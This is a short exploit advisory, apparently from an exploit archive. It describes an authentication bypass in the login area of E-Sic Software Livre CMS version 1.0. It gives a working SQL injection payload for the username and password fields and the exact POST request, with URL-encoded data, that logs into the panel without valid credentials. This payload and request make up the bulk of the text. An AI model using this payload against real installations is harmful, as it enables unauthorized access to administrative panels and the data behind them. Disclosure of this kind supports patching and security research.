E-Sic Software livre CMS - Autentication Bypass

Elber Tavares 2017-10-12 php webapps 0
# Exploit Title: E-Sic Software livre CMS - Autentication Bypass#
Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
windows 7, 8.1, 10 - Firefox# Download
More informations:

The vulnerability is in the login area of ​​e-sic,
where we can enter the panel only using some parameters such as
username and password
Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
POST: http://vulnsite/esic/index/index.php
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar